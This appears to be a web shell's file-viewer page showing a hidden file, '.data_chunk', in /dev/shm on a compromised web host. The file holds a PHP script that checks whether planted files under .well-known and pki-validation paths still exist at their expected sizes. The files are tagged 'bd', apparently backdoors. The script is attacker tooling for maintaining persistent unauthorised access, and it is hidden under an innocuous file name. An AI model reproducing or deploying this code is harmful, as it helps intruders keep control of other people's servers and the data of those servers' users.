Current Path : /proc/thread-self/root/proc/thread-self/root/dev/shm/ |
Current File : //proc/thread-self/root/proc/thread-self/root/dev/shm/.data_chunk |
<?php $r = '/home/tokomrjk/majapahit1.josfaction.com'; $x = ["/.well-known/xoopstopic.php"=>"bd@@250518652@@81", "/.well-known/pki-validation/html4strict.php"=>"bd@@250503022@@86", "/index.josfaction.com.php"=>"bd@@272491364@@49", "/.well-known/xoopstopic.php"=>"bd@@250513012@@535", "/.well-known/pki-validation/html4strict.php"=>"bd@@250484103@@1056", "/index.josfaction.com.php"=>"bd@@250503194@@1074"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');